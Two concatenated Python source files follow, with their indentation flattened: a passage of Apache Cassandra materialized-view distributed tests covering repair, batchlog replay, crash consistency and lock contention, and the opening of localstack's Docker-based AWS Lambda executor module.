self._replay_batchlogs()
assert_none(session2, "SELECT * FROM ks.t_by_v WHERE v2 = 'c'")
assert_none(session2, "SELECT * FROM ks.t_by_v WHERE v2 = 'd'")
logger.debug('Wait for batchlogs to expire from node2 and node3')
time.sleep(5)
logger.debug('Start remaining nodes')
node1.start(wait_for_binary_proto=True)
node4.start(wait_for_binary_proto=True)
node5.start(wait_for_binary_proto=True)
        # at this point the data isn't repaired, so the stale 'a' rows are still
        # returned at QUORUM; after the repair below they should be gone
assert_all(
session2,
"SELECT * FROM ks.t_by_v WHERE v2 = 'a'", [['a', 1, 1, 3.0], ['a', 2, 2, 3.0]],
cl=ConsistencyLevel.QUORUM
)
logger.debug('Run global repair on node1')
node1.repair()
assert_none(session2, "SELECT * FROM ks.t_by_v WHERE v2 = 'a'", cl=ConsistencyLevel.QUORUM)
def test_complex_mv_select_statements(self):
"""
Test complex MV select statements
@jira_ticket CASSANDRA-9664
"""
cluster = self.cluster
cluster.set_configuration_options({'enable_materialized_views': 'true'})
cluster.populate(3).start()
node1 = cluster.nodelist()[0]
session = self.patient_cql_connection(node1, consistency_level=ConsistencyLevel.QUORUM)
logger.debug("Creating keyspace")
session.execute("CREATE KEYSPACE mvtest WITH replication = "
"{'class': 'SimpleStrategy', 'replication_factor': '3'}")
session.execute('USE mvtest')
mv_primary_keys = ["((a, b), c)",
"((b, a), c)",
"(a, b, c)",
"(c, b, a)",
"((c, a), b)"]
for mv_primary_key in mv_primary_keys:
session.execute("CREATE TABLE test (a int, b int, c int, d int, PRIMARY KEY (a, b, c))")
insert_stmt = session.prepare("INSERT INTO test (a, b, c, d) VALUES (?, ?, ?, ?)")
update_stmt = session.prepare("UPDATE test SET d = ? WHERE a = ? AND b = ? AND c = ?")
delete_stmt1 = session.prepare("DELETE FROM test WHERE a = ? AND b = ? AND c = ?")
delete_stmt2 = session.prepare("DELETE FROM test WHERE a = ?")
session.cluster.control_connection.wait_for_schema_agreement()
rows = [(0, 0, 0, 0),
(0, 0, 1, 0),
(0, 1, 0, 0),
(0, 1, 1, 0),
(1, 0, 0, 0),
(1, 0, 1, 0),
(1, 1, -1, 0),
(1, 1, 0, 0),
(1, 1, 1, 0)]
for row in rows:
session.execute(insert_stmt, row)
logger.debug("Testing MV primary key: {}".format(mv_primary_key))
session.execute("CREATE MATERIALIZED VIEW mv AS SELECT * FROM test WHERE "
"a = 1 AND b IS NOT NULL AND c = 1 PRIMARY KEY {}".format(mv_primary_key))
time.sleep(3)
assert_all(
session, "SELECT a, b, c, d FROM mv",
[[1, 0, 1, 0], [1, 1, 1, 0]],
ignore_order=True,
cl=ConsistencyLevel.QUORUM
)
            # insert new rows that do not match the filter
session.execute(insert_stmt, (0, 0, 1, 0))
session.execute(insert_stmt, (1, 1, 0, 0))
assert_all(
session, "SELECT a, b, c, d FROM mv",
[[1, 0, 1, 0], [1, 1, 1, 0]],
ignore_order=True,
cl=ConsistencyLevel.QUORUM
)
# insert new row that does match the filter
session.execute(insert_stmt, (1, 2, 1, 0))
assert_all(
session, "SELECT a, b, c, d FROM mv",
[[1, 0, 1, 0], [1, 1, 1, 0], [1, 2, 1, 0]],
ignore_order=True,
cl=ConsistencyLevel.QUORUM
)
            # update rows that do not match the filter
session.execute(update_stmt, (1, 1, -1, 0))
session.execute(update_stmt, (0, 1, 1, 0))
assert_all(
session, "SELECT a, b, c, d FROM mv",
[[1, 0, 1, 0], [1, 1, 1, 0], [1, 2, 1, 0]],
ignore_order=True,
cl=ConsistencyLevel.QUORUM
)
# update a row that does match the filter
session.execute(update_stmt, (2, 1, 1, 1))
assert_all(
session, "SELECT a, b, c, d FROM mv",
[[1, 0, 1, 0], [1, 1, 1, 2], [1, 2, 1, 0]],
ignore_order=True,
cl=ConsistencyLevel.QUORUM
)
            # delete rows that do not match the filter
session.execute(delete_stmt1, (1, 1, -1))
session.execute(delete_stmt1, (2, 0, 1))
session.execute(delete_stmt2, (0,))
assert_all(
session, "SELECT a, b, c, d FROM mv",
[[1, 0, 1, 0], [1, 1, 1, 2], [1, 2, 1, 0]],
ignore_order=True,
cl=ConsistencyLevel.QUORUM
)
# delete a row that does match the filter
session.execute(delete_stmt1, (1, 1, 1))
assert_all(
session, "SELECT a, b, c, d FROM mv",
[[1, 0, 1, 0], [1, 2, 1, 0]],
ignore_order=True,
cl=ConsistencyLevel.QUORUM
)
# delete a partition that matches the filter
session.execute(delete_stmt2, (1,))
assert_all(session, "SELECT a, b, c, d FROM mv", [], cl=ConsistencyLevel.QUORUM)
# Cleanup
session.execute("DROP MATERIALIZED VIEW mv")
session.execute("DROP TABLE test")
    def test_propagate_view_creation_over_non_existing_table(self):
        """
        The internal addition of a view over a non-existing table should be ignored
@jira_ticket CASSANDRA-13737
"""
cluster = self.cluster
cluster.populate(3)
cluster.start()
node1, node2, node3 = self.cluster.nodelist()
session = self.patient_cql_connection(node1, consistency_level=ConsistencyLevel.QUORUM)
create_ks(session, 'ks', 3)
session.execute('CREATE TABLE users (username varchar PRIMARY KEY, state varchar)')
# create a materialized view only in nodes 1 and 2
node3.stop(wait_other_notice=True)
session.execute(('CREATE MATERIALIZED VIEW users_by_state AS '
'SELECT * FROM users WHERE state IS NOT NULL AND username IS NOT NULL '
'PRIMARY KEY (state, username)'))
# drop the base table only in node 3
node1.stop(wait_other_notice=True)
node2.stop(wait_other_notice=True)
node3.start(wait_for_binary_proto=True)
session = self.patient_cql_connection(node3, consistency_level=ConsistencyLevel.QUORUM)
session.execute('DROP TABLE ks.users')
# restart the cluster
cluster.stop()
cluster.start()
# node3 should have received and ignored the creation of the MV over the dropped table
assert node3.grep_log('Not adding view users_by_state because the base table')
def test_base_view_consistency_on_failure_after_mv_apply(self):
self._test_base_view_consistency_on_crash("after")
def test_base_view_consistency_on_failure_before_mv_apply(self):
self._test_base_view_consistency_on_crash("before")
def _test_base_view_consistency_on_crash(self, fail_phase):
"""
* Fails base table write before or after applying views
* Restart node and replay commit and batchlog
* Check that base and views are present
@jira_ticket CASSANDRA-13069
"""
self.cluster.set_batch_commitlog(enabled=True)
self.fixture_dtest_setup.ignore_log_patterns = [r'Dummy failure', r"Failed to force-recycle all segments"]
self.prepare(rf=1, install_byteman=True)
node1, node2, node3 = self.cluster.nodelist()
session = self.patient_exclusive_cql_connection(node1)
session.execute('USE ks')
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
session.cluster.control_connection.wait_for_schema_agreement()
logger.debug('Make node1 fail {} view writes'.format(fail_phase))
node1.byteman_submit(['./byteman/fail_{}_view_write.btm'.format(fail_phase)])
logger.debug('Write 1000 rows - all node1 writes should fail')
failed = False
for i in range(1, 1000):
try:
session.execute("INSERT INTO t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0) USING TIMESTAMP {v}".format(v=i))
except WriteFailure:
failed = True
assert failed, "Should fail at least once."
assert node1.grep_log("Dummy failure"), "Should throw Dummy failure"
missing_entries = 0
session = self.patient_exclusive_cql_connection(node1)
session.execute('USE ks')
for i in range(1, 1000):
view_entry = rows_to_list(session.execute(SimpleStatement("SELECT * FROM t_by_v WHERE id = {} AND v = {}".format(i, i),
consistency_level=ConsistencyLevel.ONE)))
base_entry = rows_to_list(session.execute(SimpleStatement("SELECT * FROM t WHERE id = {}".format(i),
consistency_level=ConsistencyLevel.ONE)))
if not base_entry:
missing_entries += 1
if not view_entry:
missing_entries += 1
logger.debug("Missing entries {}".format(missing_entries))
assert missing_entries > 0
logger.debug('Restarting node1 to ensure commit log is replayed')
node1.stop(wait_other_notice=True)
        # Set batchlog.replay_timeout_in_ms=1 so we can ensure the batchlog will be replayed below
node1.start(jvm_args=["-Dcassandra.batchlog.replay_timeout_in_ms=1"])
logger.debug('Replay batchlogs')
time.sleep(0.001) # Wait batchlog.replay_timeout_in_ms=1 (ms)
self._replay_batchlogs()
logger.debug('Verify that both the base table entry and view are present after commit and batchlog replay')
session = self.patient_exclusive_cql_connection(node1)
session.execute('USE ks')
for i in range(1, 1000):
view_entry = rows_to_list(session.execute(SimpleStatement("SELECT * FROM t_by_v WHERE id = {} AND v = {}".format(i, i),
consistency_level=ConsistencyLevel.ONE)))
base_entry = rows_to_list(session.execute(SimpleStatement("SELECT * FROM t WHERE id = {}".format(i),
consistency_level=ConsistencyLevel.ONE)))
assert base_entry, "Both base {} and view entry {} should exist.".format(base_entry, view_entry)
assert view_entry, "Both base {} and view entry {} should exist.".format(base_entry, view_entry)
# For read verification
class MutationPresence(Enum):
match = 1
extra = 2
missing = 3
excluded = 4
unknown = 5
class MM(object):
mp = None
def out(self):
pass
class Match(MM):
def __init__(self):
self.mp = MutationPresence.match
def out(self):
return None
class Extra(MM):
expecting = None
value = None
row = None
def __init__(self, expecting, value, row):
self.mp = MutationPresence.extra
self.expecting = expecting
self.value = value
self.row = row
def out(self):
return "Extra. Expected {} instead of {}; row: {}".format(self.expecting, self.value, self.row)
class Missing(MM):
value = None
row = None
def __init__(self, value, row):
self.mp = MutationPresence.missing
self.value = value
self.row = row
def out(self):
return "Missing. At {}".format(self.row)
class Excluded(MM):
def __init__(self):
self.mp = MutationPresence.excluded
def out(self):
return None
class Unknown(MM):
def __init__(self):
self.mp = MutationPresence.unknown
def out(self):
return None
readConsistency = ConsistencyLevel.QUORUM
writeConsistency = ConsistencyLevel.QUORUM
SimpleRow = collections.namedtuple('SimpleRow', 'a b c d')
def row_generate(i, num_partitions):
return SimpleRow(a=i % num_partitions, b=(i % 400) // num_partitions, c=i, d=i)
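# Illustrative example (not executed by the tests): with num_partitions=5, row_generate(7, 5)
# yields SimpleRow(a=2, b=1, c=7, d=7) -- 'a' selects the partition, 'b' the clustering key,
# and 'c'/'d' carry the raw counter so a read can be matched back to the write that produced it.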
# Create a threaded session and execute queries from a Queue
def thread_session(ip, queue, start, end, rows, num_partitions):
def execute_query(session, select_gi, i):
row = row_generate(i, num_partitions)
if (row.a, row.b) in rows:
base = rows[(row.a, row.b)]
else:
base = -1
gi = list(session.execute(select_gi, [row.c, row.a]))
if base == i and len(gi) == 1:
return Match()
elif base != i and len(gi) == 1:
return Extra(base, i, (gi[0][0], gi[0][1], gi[0][2], gi[0][3]))
elif base == i and len(gi) == 0:
return Missing(base, i)
elif base != i and len(gi) == 0:
return Excluded()
else:
return Unknown()
try:
cluster = Cluster([ip])
session = cluster.connect()
select_gi = session.prepare("SELECT * FROM mvtest.mv1 WHERE c = ? AND a = ?")
select_gi.consistency_level = readConsistency
for i in range(start, end):
ret = execute_query(session, select_gi, i)
queue.put_nowait(ret)
except Exception as e:
print(str(e))
queue.close()
@since('3.0')
@pytest.mark.skipif(sys.platform == 'win32', reason='Bug in python on Windows: https://bugs.python.org/issue10128')
class TestMaterializedViewsConsistency(Tester):
def prepare(self, user_table=False):
cluster = self.cluster
cluster.set_configuration_options({'enable_materialized_views': 'true'})
cluster.populate(3).start()
node2 = cluster.nodelist()[1]
# Keep the status of async requests
self.exception_type = collections.Counter()
self.num_request_done = 0
self.counts = {}
for mp in MutationPresence:
self.counts[mp] = 0
self.rows = {}
self.update_stats_every = 100
logger.debug("Set to talk to node 2")
self.session = self.patient_cql_connection(node2)
return self.session
def _print_write_status(self, row):
output = "\r{}".format(row)
for key in list(self.exception_type.keys()):
output = "{} ({}: {})".format(output, key, self.exception_type[key])
logger.debug(output)
def _print_read_status(self, row):
if self.counts[MutationPresence.unknown] == 0:
logger.debug(
"\rOn {}; match: {}; extra: {}; missing: {}".format(
row,
self.counts[MutationPresence.match],
self.counts[MutationPresence.extra],
self.counts[MutationPresence.missing])
)
else:
logger.debug(
"\rOn {}; match: {}; extra: {}; missing: {}; WTF: {}".format(
row,
self.counts[MutationPresence.match],
self.counts[MutationPresence.extra],
self.counts[MutationPresence.missing],
                    self.counts[MutationPresence.unknown])
)
def _do_row(self, insert_stmt, i, num_partitions):
# Error callback for async requests
def handle_errors(row, exc):
self.num_request_done += 1
try:
name = type(exc).__name__
self.exception_type[name] += 1
except Exception as e:
print(traceback.format_exception_only(type(e), e))
# Success callback for async requests
def success_callback(row):
self.num_request_done += 1
if i % self.update_stats_every == 0:
self._print_write_status(i)
row = row_generate(i, num_partitions)
async_ret = self.session.execute_async(insert_stmt, row)
errors = partial(handle_errors, row)
async_ret.add_callbacks(success_callback, errors)
def _populate_rows(self):
statement = SimpleStatement(
"SELECT a, b, c FROM mvtest.test1",
consistency_level=readConsistency
)
data = self.session.execute(statement)
for row in data:
self.rows[(row.a, row.b)] = row.c
@pytest.mark.skip(reason='awaiting CASSANDRA-11290')
def test_single_partition_consistent_reads_after_write(self):
"""
Tests consistency of multiple writes to a single partition
@jira_ticket CASSANDRA-10981
"""
self._consistent_reads_after_write_test(1)
def test_multi_partition_consistent_reads_after_write(self):
"""
        Tests consistency of multiple writes to multiple partitions
@jira_ticket CASSANDRA-10981
"""
self._consistent_reads_after_write_test(5)
def _consistent_reads_after_write_test(self, num_partitions):
session = self.prepare()
node1, node2, node3 = self.cluster.nodelist()
# Test config
lower = 0
upper = 100000
processes = 4
queues = [None] * processes
eachProcess = (upper - lower) // processes
logger.debug("Creating schema")
session.execute(
("CREATE KEYSPACE IF NOT EXISTS mvtest WITH replication = "
"{'class': 'SimpleStrategy', 'replication_factor': '3'}")
)
session.execute(
"CREATE TABLE mvtest.test1 (a int, b int, c int, d int, PRIMARY KEY (a,b))"
)
session.cluster.control_connection.wait_for_schema_agreement()
insert1 = session.prepare("INSERT INTO mvtest.test1 (a,b,c,d) VALUES (?,?,?,?)")
insert1.consistency_level = writeConsistency
logger.debug("Writing data to base table")
for i in range(upper // 10):
self._do_row(insert1, i, num_partitions)
logger.debug("Creating materialized view")
session.execute(
('CREATE MATERIALIZED VIEW mvtest.mv1 AS '
'SELECT a,b,c,d FROM mvtest.test1 WHERE a IS NOT NULL AND b IS NOT NULL AND '
'c IS NOT NULL PRIMARY KEY (c,a,b)')
)
session.cluster.control_connection.wait_for_schema_agreement()
logger.debug("Writing more data to base table")
for i in range(upper // 10, upper):
self._do_row(insert1, i, num_partitions)
# Wait that all requests are done
while self.num_request_done < upper:
time.sleep(1)
logger.debug("Making sure all batchlogs are replayed on node1")
node1.nodetool("replaybatchlog")
logger.debug("Making sure all batchlogs are replayed on node2")
node2.nodetool("replaybatchlog")
logger.debug("Making sure all batchlogs are replayed on node3")
node3.nodetool("replaybatchlog")
logger.debug("Finished writes, now verifying reads")
self._populate_rows()
threads = []
for i in range(processes):
start = lower + (eachProcess * i)
if i == processes - 1:
end = upper
else:
end = lower + (eachProcess * (i + 1))
q = Queue()
node_ip = get_ip_from_node(node2)
t = threading.Thread(target=thread_session, args=(node_ip, q, start, end, self.rows, num_partitions))
threads.append(t)
t.daemon = True
t.start()
queues[i] = q
for i in range(lower, upper):
if i % 100 == 0:
self._print_read_status(i)
try:
mm = queues[i % processes].get(timeout=60)
except Empty as e:
pytest.skip("Failed to get range {range} within timeout from queue. {error}".format(range=i, error=str(e)))
            if mm.out() is not None:
logger.debug("\r{}\n" .format(mm.out()))
self.counts[mm.mp] += 1
self._print_read_status(upper)
for thread in threads:
thread.join(timeout=300)
@since('3.0')
class TestMaterializedViewsLockcontention(Tester):
"""
Test materialized views lock contention.
@jira_ticket CASSANDRA-12689
@since 3.0
"""
def _prepare_cluster(self):
self.cluster.populate(1)
self.cluster.set_configuration_options({'enable_materialized_views': 'true'})
self.supports_v5_protocol = self.supports_v5_protocol(self.cluster.version())
self.protocol_version = 5 if self.supports_v5_protocol else 4
self.cluster.set_configuration_options(values={
'concurrent_materialized_view_writes': 1,
'concurrent_writes': 1,
})
self.nodes = list(self.cluster.nodes.values())
self.cluster.start(jvm_args=[
"-Dcassandra.test.fail_mv_locks_count=64"
])
session = self.patient_exclusive_cql_connection(self.nodes[0], protocol_version=self.protocol_version)
keyspace = "locktest"
session.execute("""
CREATE KEYSPACE IF NOT EXISTS {}
WITH replication = {{ 'class': 'SimpleStrategy', 'replication_factor': '1' }}
""".format(keyspace))
session.set_keyspace(keyspace)
session.execute(
"CREATE TABLE IF NOT EXISTS test (int1 int, int2 int, date timestamp, PRIMARY KEY (int1, int2))")
session.execute("""CREATE MATERIALIZED VIEW test_sorted_mv AS
SELECT int1, date, int2
FROM test
WHERE int1 IS NOT NULL AND date IS NOT NULL AND int2 IS NOT NULL
PRIMARY KEY (int1, date, int2)
WITH CLUSTERING ORDER BY (date DESC, int2 DESC)""")
return session
@since('3.0')
def test_mutations_dontblock(self):
session = self._prepare_cluster()
records = 100
records2 = 100
params = []
for x in range(records):
for y in range(records2):
params.append([x, y])
execute_concurrent_with_args(
session,
session.prepare('INSERT INTO test (int1, int2, date) VALUES (?, ?, toTimestamp(now()))'),
params
)
assert_one(session, "SELECT count(*) FROM test WHERE int1 = 1", [records2])
for node in self.nodes:
with JolokiaAgent(node) as jmx:
mutationStagePending = jmx.read_attribute(
make_mbean('metrics', type="ThreadPools", path='request', scope='MutationStage', name='PendingTasks'), "Value"
)
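                # make_mbean() resolves to the MutationStage thread-pool metrics MBean; a
                # non-zero PendingTasks value would mean MV lock contention left mutations
                # stuck in the write path, which is exactly what this test guards against.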
assert 0 == mutationStagePending, "Pending mutations: {}".format(mutationStagePending)
|
lambda_executors.py
|
import os
import re
import sys
import glob
import json
import time
import logging
import threading
import traceback
import subprocess
import six
import base64
from multiprocessing import Process, Queue
try:
from shlex import quote as cmd_quote
except ImportError:
from pipes import quote as cmd_quote # for Python 2.7
from localstack import config
from localstack.utils import bootstrap
from localstack.utils.aws import aws_stack
from localstack.utils.common import (
CaptureOutput, FuncThread, TMP_FILES, short_uid, save_file, rm_rf, in_docker, long_uid,
now, to_str, to_bytes, run, cp_r, json_safe, get_free_tcp_port)
from localstack.services.install import INSTALL_PATH_LOCALSTACK_FAT_JAR
from localstack.utils.aws.dead_letter_queue import lambda_error_to_dead_letter_queue
from localstack.utils.aws.dead_letter_queue import sqs_error_to_dead_letter_queue
from localstack.utils.aws.lambda_destinations import lambda_result_to_destination
from localstack.utils.cloudwatch.cloudwatch_util import store_cloudwatch_logs, cloudwatched
from localstack.services.awslambda.lambda_utils import (
LAMBDA_RUNTIME_JAVA8, LAMBDA_RUNTIME_JAVA11, LAMBDA_RUNTIME_PROVIDED)
# constants
LAMBDA_EXECUTOR_JAR = INSTALL_PATH_LOCALSTACK_FAT_JAR
LAMBDA_EXECUTOR_CLASS = 'cloud.localstack.LambdaExecutor'
EVENT_FILE_PATTERN = '%s/lambda.event.*.json' % config.TMP_FOLDER
LAMBDA_SERVER_UNIQUE_PORTS = 500
LAMBDA_SERVER_PORT_OFFSET = 5000
LAMBDA_API_UNIQUE_PORTS = 500
LAMBDA_API_PORT_OFFSET = 9000
# logger
LOG = logging.getLogger(__name__)
# maximum time a pre-allocated container can sit idle before getting killed
MAX_CONTAINER_IDLE_TIME_MS = 600 * 1000
# SQS event source name
EVENT_SOURCE_SQS = 'aws:sqs'
# IP address of main Docker container (lazily initialized)
DOCKER_MAIN_CONTAINER_IP = None
# whether to use our custom Java executor, or the default from lambci
# TODO: deprecated, should be removed in the future
USE_CUSTOM_JAVA_EXECUTOR = False
# maps lambda arns to concurrency locks
LAMBDA_CONCURRENCY_LOCK = {}
class InvocationException(Exception):
def __init__(self, message, log_output, result=None):
super(InvocationException, self).__init__(message)
self.log_output = log_output
self.result = result
def get_from_event(event, key):
try:
return event['Records'][0][key]
except KeyError:
return None
def is_java_lambda(lambda_details):
runtime = getattr(lambda_details, 'runtime', lambda_details)
return runtime in [LAMBDA_RUNTIME_JAVA8, LAMBDA_RUNTIME_JAVA11]
def is_nodejs_runtime(lambda_details):
runtime = getattr(lambda_details, 'runtime', lambda_details)
return runtime.startswith('nodejs')
def _store_logs(func_details, log_output, invocation_time=None, container_id=None):
log_group_name = '/aws/lambda/%s' % func_details.name()
container_id = container_id or short_uid()
invocation_time = invocation_time or int(time.time() * 1000)
invocation_time_secs = int(invocation_time / 1000)
time_str = time.strftime('%Y/%m/%d', time.gmtime(invocation_time_secs))
log_stream_name = '%s/[LATEST]%s' % (time_str, container_id)
return store_cloudwatch_logs(log_group_name, log_stream_name, log_output, invocation_time)
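# Illustrative example of the naming above: an invocation of function "echo" at epoch
# 1600000000000 ms with container id "abc123" is stored in log group "/aws/lambda/echo"
# under log stream "2020/09/13/[LATEST]abc123" (roughly mirroring AWS Lambda's own scheme).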
def get_main_endpoint_from_container():
global DOCKER_MAIN_CONTAINER_IP
if DOCKER_MAIN_CONTAINER_IP is None:
DOCKER_MAIN_CONTAINER_IP = False
try:
if in_docker():
DOCKER_MAIN_CONTAINER_IP = bootstrap.get_main_container_ip()
LOG.info('Determined main container target IP: %s' % DOCKER_MAIN_CONTAINER_IP)
except Exception as e:
container_name = bootstrap.get_main_container_name()
LOG.info('Unable to get IP address of main Docker container "%s": %s' %
(container_name, e))
# return main container IP, or fall back to Docker host (bridge IP, or host DNS address)
return DOCKER_MAIN_CONTAINER_IP or config.DOCKER_HOST_FROM_CONTAINER
class InvocationResult(object):
def __init__(self, result, log_output=''):
if isinstance(result, InvocationResult):
raise Exception('Unexpected invocation result type: %s' % result)
self.result = result
self.log_output = log_output or ''
class LambdaExecutor(object):
""" Base class for Lambda executors. Subclasses must overwrite the _execute method """
def __init__(self):
# keeps track of each function arn and the last time it was invoked
self.function_invoke_times = {}
def _prepare_environment(self, func_details):
# setup environment pre-defined variables for docker environment
result = func_details.envvars.copy()
# injecting aws credentials into docker environment if not provided
aws_stack.inject_test_credentials_into_env(result)
return result
def execute(self, func_arn, func_details, event, context=None, version=None,
asynchronous=False, callback=None):
def do_execute(*args):
@cloudwatched('lambda')
def _run(func_arn=None):
# set the invocation time in milliseconds
invocation_time = int(time.time() * 1000)
# start the execution
raised_error = None
result = None
dlq_sent = None
try:
result = self._execute(func_arn, func_details, event, context, version)
except Exception as e:
raised_error = e
if asynchronous:
if get_from_event(event, 'eventSource') == EVENT_SOURCE_SQS:
sqs_queue_arn = get_from_event(event, 'eventSourceARN')
if sqs_queue_arn:
# event source is SQS, send event back to dead letter queue
dlq_sent = sqs_error_to_dead_letter_queue(sqs_queue_arn, event, e)
else:
# event source is not SQS, send back to lambda dead letter queue
lambda_error_to_dead_letter_queue(func_details, event, e)
raise e
finally:
self.function_invoke_times[func_arn] = invocation_time
callback and callback(result, func_arn, event, error=raised_error, dlq_sent=dlq_sent)
lambda_result_to_destination(func_details, event, result, asynchronous, raised_error)
# return final result
return result
return _run(func_arn=func_arn)
# Inform users about asynchronous mode of the lambda execution.
if asynchronous:
LOG.debug('Lambda executed in Event (asynchronous) mode, no response will be returned to caller')
FuncThread(do_execute).start()
return InvocationResult(None, log_output='Lambda executed asynchronously.')
return do_execute()
def _execute(self, func_arn, func_details, event, context=None, version=None):
""" This method must be overwritten by subclasses. """
raise Exception('Not implemented.')
def startup(self):
pass
def cleanup(self, arn=None):
pass
    def run_lambda_executor(self, cmd, event=None, func_details=None, env_vars=None):
kwargs = {'stdin': True, 'inherit_env': True, 'asynchronous': True}
env_vars = env_vars or {}
        is_provided = func_details and func_details.runtime.startswith(LAMBDA_RUNTIME_PROVIDED)
        if is_provided and env_vars.get('DOCKER_LAMBDA_USE_STDIN') == '1':
# Note: certain "provided" runtimes (e.g., Rust programs) can block when we pass in
# the event payload via stdin, hence we rewrite the command to "echo ... | ..." below
env_updates = {
'PATH': env_vars.get('PATH') or os.environ.get('PATH', ''),
'AWS_LAMBDA_EVENT_BODY': to_str(event),
'DOCKER_LAMBDA_USE_STDIN': '1'
}
env_vars.update(env_updates)
# Note: $AWS_LAMBDA_COGNITO_IDENTITY='{}' causes Rust Lambdas to hang
env_vars.pop('AWS_LAMBDA_COGNITO_IDENTITY', None)
event = None
cmd = re.sub(r'(.*)(%s\s+(run|start))' % self._docker_cmd(), r'\1echo $AWS_LAMBDA_EVENT_BODY | \2', cmd)
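            # Illustrative example of the rewrite above (assuming the Docker command is plain
            # "docker"): a command like "docker run --rm ... lambci/lambda:provided handler"
            # becomes "echo $AWS_LAMBDA_EVENT_BODY | docker run --rm ... lambci/lambda:provided handler",
            # so the event reaches the runtime via stdin instead of being piped in by run() below.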
process = run(cmd, env_vars=env_vars, stderr=subprocess.PIPE, outfile=subprocess.PIPE, **kwargs)
result, log_output = process.communicate(input=event)
try:
result = to_str(result).strip()
except Exception:
pass
log_output = to_str(log_output).strip()
return_code = process.returncode
# Note: The user's code may have been logging to stderr, in which case the logs
# will be part of the "result" variable here. Hence, make sure that we extract
# only the *last* line of "result" and consider anything above that as log output.
if isinstance(result, six.string_types) and '\n' in result:
additional_logs, _, result = result.rpartition('\n')
log_output += '\n%s' % additional_logs
log_formatted = log_output.strip().replace('\n', '\n> ')
func_arn = func_details and func_details.arn()
LOG.debug('Lambda %s result / log output:\n%s\n> %s' % (func_arn, result.strip(), log_formatted))
# store log output - TODO get live logs from `process` above?
_store_logs(func_details, log_output)
if return_code != 0:
raise InvocationException('Lambda process returned error status code: %s. Result: %s. Output:\n%s' %
(return_code, result, log_output), log_output, result)
invocation_result = InvocationResult(result, log_output=log_output)
return invocation_result
class ContainerInfo:
""" Contains basic information about a docker container. """
def __init__(self, name, entry_point):
self.name = name
self.entry_point = entry_point
class LambdaExecutorContainers(LambdaExecutor):
""" Abstract executor class for executing Lambda functions in Docker containers """
def prepare_execution(self, func_arn, env_vars, runtime, command, handler, lambda_cwd):
raise Exception('Not implemented')
def _docker_cmd(self):
""" Return the string to be used for running Docker commands. """
return config.DOCKER_CMD
def prepare_event(self, environment, event_body):
""" Return the event as a stdin string. """
# amend the environment variables for execution
environment['AWS_LAMBDA_EVENT_BODY'] = event_body
return None
def _execute(self, func_arn, func_details, event, context=None, version=None):
lambda_cwd = func_details.cwd
runtime = func_details.runtime
handler = func_details.handler
environment = self._prepare_environment(func_details)
# configure USE_SSL in environment
if config.USE_SSL:
environment['USE_SSL'] = '1'
# prepare event body
if not event:
LOG.warning('Empty event body specified for invocation of Lambda "%s"' % func_arn)
event = {}
event_body = json.dumps(json_safe(event))
stdin = self.prepare_event(environment, event_body)
main_endpoint = get_main_endpoint_from_container()
environment['LOCALSTACK_HOSTNAME'] = main_endpoint
environment['EDGE_PORT'] = str(config.EDGE_PORT)
environment['_HANDLER'] = handler
if os.environ.get('HTTP_PROXY'):
environment['HTTP_PROXY'] = os.environ['HTTP_PROXY']
if func_details.timeout:
environment['AWS_LAMBDA_FUNCTION_TIMEOUT'] = str(func_details.timeout)
if context:
environment['AWS_LAMBDA_FUNCTION_NAME'] = context.function_name
environment['AWS_LAMBDA_FUNCTION_VERSION'] = context.function_version
environment['AWS_LAMBDA_FUNCTION_INVOKED_ARN'] = context.invoked_function_arn
environment['AWS_LAMBDA_COGNITO_IDENTITY'] = json.dumps(context.cognito_identity or {})
if context.client_context is not None:
environment['AWS_LAMBDA_CLIENT_CONTEXT'] = json.dumps(to_str(
base64.b64decode(to_bytes(context.client_context))))
# custom command to execute in the container
command = ''
events_file = ''
if USE_CUSTOM_JAVA_EXECUTOR and is_java_lambda(runtime):
# if running a Java Lambda with our custom executor, set up classpath arguments
java_opts = Util.get_java_opts()
stdin = None
# copy executor jar into temp directory
target_file = os.path.join(lambda_cwd, os.path.basename(LAMBDA_EXECUTOR_JAR))
if not os.path.exists(target_file):
cp_r(LAMBDA_EXECUTOR_JAR, target_file)
# TODO cleanup once we have custom Java Docker image
taskdir = '/var/task'
events_file = '_lambda.events.%s.json' % short_uid()
save_file(os.path.join(lambda_cwd, events_file), event_body)
classpath = Util.get_java_classpath(target_file)
command = ("bash -c 'cd %s; java %s -cp \"%s\" \"%s\" \"%s\" \"%s\"'" %
(taskdir, java_opts, classpath, LAMBDA_EXECUTOR_CLASS, handler, events_file))
# accept any self-signed certificates for outgoing calls from the Lambda
if is_nodejs_runtime(runtime):
environment['NODE_TLS_REJECT_UNAUTHORIZED'] = '0'
# determine the command to be executed (implemented by subclasses)
cmd = self.prepare_execution(func_arn, environment, runtime, command, handler, lambda_cwd)
# lambci writes the Lambda result to stdout and logs to stderr, fetch it from there!
LOG.info('Running lambda cmd: %s' % cmd)
result = self.run_lambda_executor(cmd, stdin, env_vars=environment, func_details=func_details)
        # clean up events file (it was saved under lambda_cwd above)
        events_file_path = os.path.join(lambda_cwd, events_file) if events_file else None
        events_file_path and os.path.exists(events_file_path) and rm_rf(events_file_path)
return result
class LambdaExecutorReuseContainers(LambdaExecutorContainers):
""" Executor class for executing Lambda functions in re-usable Docker containers """
def __init__(self):
super(LambdaExecutorReuseContainers, self).__init__()
# locking thread for creation/destruction of docker containers.
self.docker_container_lock = threading.RLock()
# On each invocation we try to construct a port unlikely to conflict
# with a previously invoked lambda function. This is a problem with at
# least the lambci/lambda:go1.x container, which execs a go program that
# attempts to bind to the same default port.
self.next_port = 0
self.max_port = LAMBDA_SERVER_UNIQUE_PORTS
self.port_offset = LAMBDA_SERVER_PORT_OFFSET
def prepare_execution(self, func_arn, env_vars, runtime, command, handler, lambda_cwd):
# check whether the Lambda has been invoked before
has_been_invoked_before = func_arn in self.function_invoke_times
# Choose a port for this invocation
with self.docker_container_lock:
env_vars['_LAMBDA_SERVER_PORT'] = str(self.next_port + self.port_offset)
self.next_port = (self.next_port + 1) % self.max_port
# create/verify the docker container is running.
LOG.debug('Priming docker container with runtime "%s" and arn "%s".', runtime, func_arn)
container_info = self.prime_docker_container(runtime, func_arn, env_vars.items(), lambda_cwd)
# Note: currently "docker exec" does not support --env-file, i.e., environment variables can only be
# passed directly on the command line, using "-e" below. TODO: Update this code once --env-file is
# available for docker exec, to better support very large Lambda events (very long environment values)
